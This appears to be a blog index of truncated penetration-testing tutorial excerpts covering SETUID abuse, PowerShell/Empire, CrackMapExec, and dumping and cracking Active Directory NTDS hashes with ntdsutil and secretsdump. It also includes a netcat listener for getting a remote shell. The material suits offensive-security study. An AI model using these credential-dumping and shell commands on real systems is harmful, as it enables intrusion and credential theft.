[ Pen Testing ] :: Step by Step :: Exploiting SETUID

This entry is part 1 of 1 in the series [ Penetration Testing ]

Setting the user ID on an executable means it runs under that user’s permissions, not the perms of the user that runs the executable. It’s highly useful in system admin, but it’s wildly dangerous too, because every SETUID file is a vector for hacking. John Hammond (on YouTube) give an excellent example in the context …

Study Hacking With Code Red: Free Video Courses

This entry is part 1 of 1 in the series Pen Testing Windows

You should try this. If you seriously want to learn hacking, you should check out EC-Council’s Code Red training site. I’ve been checking out the free-level offerings, and I’m impressed. Go here and create an account,  with the usual precautions: https://codered.eccouncil.org/Home Do you use Python? (Of course you do.) Here’s a link to a course …

[ Pen Testing Windows ] :: Penetration Testing Windows: Powershell/Empire

Powershell

Powershell Powershell is the object-oriented replacement for the ancient Windows cmd.exe. It it not present on all installations of Windows, but can be added via a download from Microsoft. There are five versions of Powershell at the moment (2018). You can start it by typing powershell in the runline or in cmd. Before going any …

[ Pen Testing Windows ] :: Penetration Testing Windows: CrackMapExec

Hacking in the dark

Gather Your Tools First off, be a smart hacker and know how to find great online materials, like this how-to: https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-1.html And this excellent tute on CrackMapExec: https://www.ivoidwarranties.tech/posts/pentesting-tuts/cme/crackmapexec/ For the TL;DR of that page, start in Bash: # get syntax and details python crackmapexec.py # network enumeration python crackmapexec.py 192.168.1.0/24 Executing Commands Note that if …

[ Pen Testing Windows ] :: Active Directory: Extracting NTDS and Cracking Hashes

Glenn Norman

Okay, you’ve gotten System user access on your Windows target, and now you want to get the goodies in Active Directory. Here’s the ultra-short version: Open Powershell and enter: ntdsutilActivate Instance ntdsifmcreate full c:\bak_fldrquitquit Check out this video that details of creating the NTDS backup, extracting data with secretsdump.py, https://github.com/SecureAuthCorp/im packet/blob/master/examples/secretsdump.py , and cracking password …

[ Pen Testing ] :: Step by Step: Uploading Shellcode and Upgrading the Shell

Blue Security Goddess

Getting a Remote Shell Let’s assume you’ve found some sort of access to your target, ideally an upload vulnerability that will let you get some shellcode onto the target. Netcat You could just start a Netcat listener on the victim, if Netcat is available: nc -lvnp 1234 … and start a shell on the attack …